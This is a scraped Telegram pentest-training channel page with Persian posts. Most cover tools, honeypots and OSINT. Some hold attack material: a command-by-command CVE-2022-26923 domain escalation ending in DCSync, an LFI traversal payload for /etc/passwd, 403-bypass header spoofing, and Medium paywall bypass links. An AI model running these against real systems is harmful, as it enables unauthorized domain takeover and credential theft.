Try Hack Box – Telegram
Try Hack Box
5.77K subscribers
682 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
💢 شماره پورت‌های TCP/UDP و عملکرد و کاربرد هریک

🔸از اون دسته پست‌هایی که باید ذخیره کنید؛ یه جایی به کارتون میاد

#TCP
#UDP

@TryHackBox
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
🖼 Bypass Medium Paywall

اگر شما هم مثل من با مقالات پولی از Medium برخورد کنید، کمی لایف هک کنید. این سایت ها به شما امکان می دهند مقالات پولی Medium را به صورت رایگان بخوانید:


🔗 https://freedium.cfd/<URL>
🔗 https://medium-forall.vercel.app/

#medium

@TryHackBox
نکات و ترفندهای پاورشل - قسمت اول


https://www.instagram.com/p/C2-R6NIOv_J/?igsh=MzRlODBiNWFlZA==


#powershell
@TryHackBox
This media is not supported in your browser
VIEW IN TELEGRAM
8 نوع از حملات سایبری...

@TryHackBox
👍3
Zmap-ProxyScanner

راهی سریع و امن برای یافتن سرورهای پروکسی. 2000-5000 پروکسی http, socks4, socks5 کارآمد را در یک اسکن پیدا کنید.

Config

{
"check-site": "https://google.com",
"proxy-type": "http",

"http_threads": 2000,
"headers": {
"user-agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.115 Safari/537.36",
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8"
},
"print_ips": {
"enabled": true,
"display-ip-info": true
},
"timeout": {
"http_timeout": 5,
"socks4_timeout": 5,
"socks5_timeout": 5
}
}


https://github.com/Yariya/Zmap-ProxyScanner
#zamp
@TryHackBox
@TryHackBoxOfficial
@LibrarySecOfficial
👍3
Media is too big
VIEW IN TELEGRAM
Sql Server Hacking: Master The Basics!

@TryHackBox
🗄Microsoft SQL DBMS
اغلب می‌توان در طول پنت‌ست زیرساخت‌های داخلی ویندوز یافت، بنابراین مهم است که یک زنجیره ابزار با کیفیت بالا در دسترس داشته باشید. دو ابزار را بگیرید که به شما امکان می دهد حملات زیر را انجام دهید.

1. Enumeration Techniques
2. Authentication Providers
3. Using Standard Modules
4. Using Linked Modules
5. Using Impersonation Modules
6. Using SCCM Modules
7. Contributing and Extending SQLRecon
8. Hardening your SQL Server Environment

SQLRecon
PySQLRecon

#tools #pentest #redteam
@TryHackBox
🔥2
چندین روش برای بایپس 403 Forbidden HTTP response توضیح دهید .

🔸 اگر سرور از روش‌های مختلف HTTP (مثلا POST به جای GET) استفاده کنید یا پارامترهای هدر/URL را لغو کنید (مثلاً X-HTTP-Method)
🔸 استفاده از هدرهای HTTP Origin Client (به عنوان مثال X-Forwarded-For) برای جعل آدرس IP مبدا و دور زدن لیست سیاه IP
🔸 مسیر URL را با استفاده از پیمایش دایرکتوری، تغییر حروف کوچک، اضافه کردن کاراکترها، رمزگذاری URL و موارد دیگر کنترل کنید
#questions_from_social
@TryHackBox
@TryHackBoxOfficial > RoadMap
@LibrarySecOfficial > Book
👍4
Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️

اجازه دهید به طور خلاصه در مورد یک آسیب پذیری جالب صحبت کنیم که به ما امکان می دهد دسترسی ها را در یک دامنه افزایش دهیم.
الزامات:
1. حساب دامنه.
2. امکان افزودن کامپیوتر به دامنه.
3. در دسترس بودن یک الگوی استاندارد گواهی ماشین.
4. امکان تغییر ویژگی های یک حساب کامپیوتر (به طور پیش فرض پس از افزودن کامپیوتر به دامنه خواهد بود، زیرا ما مالک شی خواهیم بود).

🐍 برای عملیات ما از ابزار Certipy استفاده می کنیم؛ اطلاعات مختصری در مورد آن در زیر ارائه شده است:
# نصب و راه اندازی
pip install certipy-ad

# درخواست گواهی
# برای certipy-ad نسخه 3.0.0:
گواهی
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# برای certipy-ad نسخه 4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10

# مجوز با گواهی برای بازیابی هش NTLM:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10
بیایید حمله را با افزودن یک کامپیوتر به دامنه با استفاده از Impacket-Addcomputer شروع کنیم

addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'
ما یک گواهی برای حساب کامپیوتر (الگوی ماشین) درخواست می کنیم و با آن وارد می شویم:

certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

certipy auth -pfx testpc.pfx

بعد، به هر میزبان دامنه بروید و شروع به تغییر SPN ورودی رایانه خود کنید:
Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # به دلیل یک SPN تکراری خطایی را برمی‌گرداند
Set-ADComputer TESTPC -ServicePrincipalName @{} # reset SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local

ما به میزبان مهاجم برمی گردیم و یک گواهی جدید درخواست می کنیم:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

ما با گواهی دریافت شده وارد می شویم و هش NTLM حساب کنترل کننده دامنه را دریافت می کنیم:
certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733

در مرحله بعد، ما یک حمله DCSync را به هر شکلی که برای ما مناسب باشد انجام می دهیم و دامنه را تصرف می کنیم:

secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt

این وکتور فقط در یک محیط اکتیو دایرکتوری آسیب پذیر به CVE-2022-26923 کار می کند، اما اگر خود را در یکی بیابید، افزایش دسترسی ها به آسانی، به عنوان مثال، در مورد سوء استفاده از ZeroLogon خواهد بود!🔺

#AD
@TryHackBox
1👍1🔥1
برگه تقلب در دستورات netcat در لینوکس
@TryHackBox
🛡تفاوت IDS و HIDS و NIDS

@TryHackBox
👍2
🤔 آیا همیشه از آزمایش سایت های استاتیک صرف نظر می کنید؟ چندین دلیل برای عدم انجام این کار وجود دارد:

1️⃣ فایل های پشتیبان را باز کنید: فقط یک فرهنگ لغت با پسوندهایی مانند .bak/.zip بگیرید و با Burp، ffuf یا ابزارهای دیگر اسکن کنید. برای جستجوی نسخه های پشتیبان نیز از موارد زیر استفاده کنید:

🔸Google-Docs
🔸Wayback Machine
🔸Robots.txt
🔸Directory listings


2️⃣ پورتال/پنل هایی را باز کنید که از طریق آنها می توانید دسترسی ها را افزایش دهید
3️⃣ نسخه های سرور آسیب پذیر

#tips #bugbounty
@TryHackBox
@TryHackBoxOfficial
👩‍💻 Honeypot:
مجموعه ای از بانک های اطلاعاتی هانی پات

این پایگاه‌های داده واقعاً آسیب‌پذیر هستند که معمولاً حملاتی مانند تزریق SQL را جذب می‌کنند .

- طراحی شده تا مهاجمان را فریب دهد تا فکر کنند ممکن است حاوی اطلاعات محرمانه مانند جزئیات کارت بانکی باشند.

1. pg-server
- شبیه ساز سرور پایگاه داده Postgres، پروکسی و فریب.
2. dns.py
- اسکریپتی برای ایجاد یک هانی‌پات DNS که همه درخواست‌ها را در پایگاه داده SQLite ثبت می‌کند و سطح تعاملی قابل تنظیمی دارد.
3. RedisHoneyPot
یک هانی پات بسیار تعاملی برای پروتکل Redis است. می تواند اجرای دستورات ping, info, set, get, del, exists, keys, flushall, flushdb, save, select, dbsize, config, slaveof را شبیه سازی کند.
4. mysql-honeypotd
- هانی پات MySQL با تعامل کم که به زبان C نوشته شده است.
5. MongoDB-HoneyProxy
یک پراکسی honeypot برای mongod است که ترافیک را به یک سرور ساختگی ثبت می کند.

#Honeypot
@TryHackBox
@TryHackBoxOfficial
👍3
LFI
*
Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
#LFI
@TryHackBox
@TryHackBoxOfficial
👍3👎2
🔎 نقشه ذهنی Shodan.

• اگر گوگل سایت های خبری و دایره المعارف هایی را که به طور خاص در معرض دید عموم قرار دارند ایندکس می کند، آنگاه Shodan یک موتور جستجو است که به طور خاص تمام دستگاه های محاسباتی متصل به اینترنت (دوربین های وب، روترها، سرورها، دستگاه های اینترنت اشیا و غیره) را فهرست می کند و به شما این امکان را می دهد که آنها را با استفاده از پرس و جوها و فیلترهای مختلف جستجو پیدا کنید.

• برای استفاده از Shodan، پیشنهاد می کنم با Mindmap مفید آشنا شوید که به شما در درک فیلترها، کوئری ها و آموزش کار با این ابزار کمک می کند.

➡️ Mindmap
را با فرمت مناسب دانلود کنید:
https://github.com/Ignitechnologies/Mindmap/tree/main/Shodan

#Shodan
@TryHackBox
@TryHackBoxOfficial
👍6
🔄 بیش از 40 افزونه OSINT برای Google Chrome و Firefox.

• افزونه‌های مرورگر می‌توانند تفاوت بزرگی را برای متخصصان #OSINT ایجاد کنند، بدون اینکه به افزایش بهره‌وری در محل کار اشاره کنیم.

• این مخزن حاوی بیش از 40 افزونه مفید Google Chrome و Firefox است که به شما در تجزیه و تحلیل داده ها از منابع باز کمک می کند و در کار شما مفید خواهد بود:

➡️ https://github.com/cqcore/OSINT-Browser-Extensions

#OSINT
@TryHackBox
@TryHackBoxOfficial
👍1
Media is too big
VIEW IN TELEGRAM
https://github.com/akto-api-security/akto

1. یک افزونه برای Burp نصب کنید تا تمام درخواست‌ها را در Akto جمع‌آوری کند، در سایت قدم بزنید.
2. بررسی های لازم را برای جستجوی IDOR ، Parameter Pollution ، SQLi و سایر باگ ها انتخاب کنید.
3. آپلود گزارش های آماده همراه با یافته ها. ما در H1 معامله می کنیم و سود می گیریم.

یک اسکنر منبع باز جالب که نقل قول ها را در درخواست های API برای شما درج می کند و آسیب پذیری های زیادی از جمله OWASP Top 10 و HackerOne Top 10 را جستجو می کند.

می توانید تست های خود را در YAML شرح دهید؛ ماژول های آماده ای برای استفاده وجود دارد. به عنوان مثال، تمام پورت ها را با استفاده از SSRF اسکن کنید، مانند نسخه نمایشی
https://www.youtube.com/watch?v=WjNNh6asAD0

@TryHackBox
@TryHackBoxOfficial
👍5
👩‍💻 Honeypot:
مجموعه ای از Honeypot SSH

در این پست من مجموعه ای از هانی پات های منبع باز را با شما به اشتراک می گذارم که می توانید از آنها برای محافظت از سرورهای خود استفاده کنید.

در اینجا هانی‌پات‌های ساده‌تر و منفرد فهرست شده‌اند که از وب‌سایت‌ها و سرویس‌هایی که از پروتکل‌های SSH پشتیبانی می‌کنند تقلید می‌کنند. برخی دارای تجزیه و تحلیل داخلی برای ردیابی و تجزیه و تحلیل فعالیت Honeypot هستند، اما آنها به اندازه سیستم های فریب پیچیده نیستند.

1. Cowrie
- هانی پات SSH و Telnet با قابلیت همکاری متوسط ​​تا بالا. طراحی شده برای ثبت تلاش های brute force .
2. sshesame
یک سرور SSH جعلی برای راه‌اندازی آسان است که به هر کسی اجازه می‌دهد متصل شود و اتصالات و فعالیت‌های SSH را بدون اجرای هیچ دستور یا درخواستی ثبت کند.
3. pshitt
یک سرور SSH جعلی کم حجم است که برای جمع آوری داده های احراز هویت ارسال شده توسط مهاجمان طراحی شده است. ورود و رمزهای عبور استفاده شده توسط نرم افزار SSH brute force در JSON را ذخیره می کند.
4. SSH Honeypot
راه حل دیگری برای جمع آوری اطلاعات اولیه حمله است. به اتصالات ssh ورودی گوش می دهد و آدرس IP، نام کاربری و رمز عبوری که کلاینت استفاده می کند را ثبت می کند.
5. FakeSSH
- یک سرور فریبنده SSH با تعامل کم که در Go نوشته شده است. تلاش برای ورود به سیستم ثبت می کند، اما همیشه پاسخ می دهد که رمز عبور نادرست است.

#SSH #Honeypot
@TryHackBox
@TryHackBoxOfficial
👍4
👩‍💻 Honeypot:
مجموعه ای از Honeypot های ایمیل
آنها نشان دهنده آدرس های ایمیل نادرست هستند. ایمیل های دریافتی توسط هر مهاجمی قابل نظارت و تایید هستند.

می تواند برای جلوگیری از ایمیل های فیشینگ استفاده شود.

1. SHIVA Spampot
یک طعمه هرزنامه رله ای است که در پایتون 3 نوشته شده است. از یک جفت کانتینر Docker تشکیل شده است که یکی از آنها گیرنده است - یک سرور SMTP که تمام ایمیل های ارسال شده به آن را دریافت می کند و دومی یک تحلیلگر است که eml. را تجزیه می کند. و فایل ابرداده و استخراج شناسه های مختلف از حروف: اطلاعات در مورد گیرندگان، URL ها، پیوست ها، متن نامه.

- اطلاعات در Elasticsearch/OpenSearch برای جستجو و تجزیه و تحلیل راحت تر نمایه می شود.



2. Honey
یک راه حل ضد هرزنامه بسته بندی شده برای لاراول است که Honeypot، سیستم مسدود کننده هرزنامه و reCAPTCHA را ترکیب می کند. بیشتر یک ابزار ضد اسپم فعال است تا یک ابزار تحقیق.

3. Mailoney
یکی دیگر از هانی پات های SMTP با عملکرد اولیه است. مدت زیادی است که هیچ به روز رسانی مهمی دریافت نکرده ام.

4. imap-honey
- یک Honeypot ساده IMAP و SMTP که به زبان Golang نوشته شده است.

#Honeypot #Phishing
@TryHackBox
@TryHackBoxOfficial
👍2
👩‍💻 Honeypot:
مجموعه ای از Honeypot های RDP

و در اینجا انتخاب نهایی در Honeypot های RDP است. این ابزارها به شما امکان تقلید از دسکتاپ‌های آسیب‌پذیر از راه دور را می‌دهند و محققان یا مهاجمان را برای گرفتن داده‌ها جذب می‌کنند.

1. ad-honeypot-autodeploy
- تله تعامل بالا - دامنه آسیب‌پذیر ویندوز عمداً ناامن است . در یک ماشین مجازی مبتنی بر libvirt با QEMU/KVM اجرا می شود، اما می تواند در فضای ابری نیز مستقر شود.

- شامل ویندوز سرور 2016 به عنوان یک کنترل کننده دامنه و یک دستگاه ویندوز 10 (21H2). سرویس های RDP و WinRM روی آن فعال هستند.

2. pyrd
- ابزار و کتابخانه ای برای پایتون 3 که به شما امکان می دهد یک حمله MITM را علیه مهاجمی که به هانی پات متصل می شود، پیاده سازی کنید. به شما امکان می دهد اتصالات را در زمان واقعی و بعد از واقعیت مشاهده کنید.

#Honeypot #RDP
@TryHackBox
@TryHackBoxOfficial
👍1
Media is too big
VIEW IN TELEGRAM
🏃‍♂️ روش SSRF .

جریانی از KathanP19 ، اختصاص داده شده به روش جستجوی آسیب‌پذیری‌های SSRF در حالت دستی و خودکار.

جعل درخواست سمت سرور (SSRF) نوعی آسیب پذیری برنامه وب است که به مهاجم اجازه می دهد درخواست های HTTP دلخواه را از یک برنامه وب آسیب پذیر به یک سرور خارجی ارسال کند. یک برنامه را می توان فریب داد تا درخواست های مخرب را به سیستم های داخلی ارسال کند که می تواند منجر به افشای داده های حساس یا سایر مسائل امنیتی شود.

#SSRF #Web
@TryHackBox
@TryHackBoxOfficial
👍5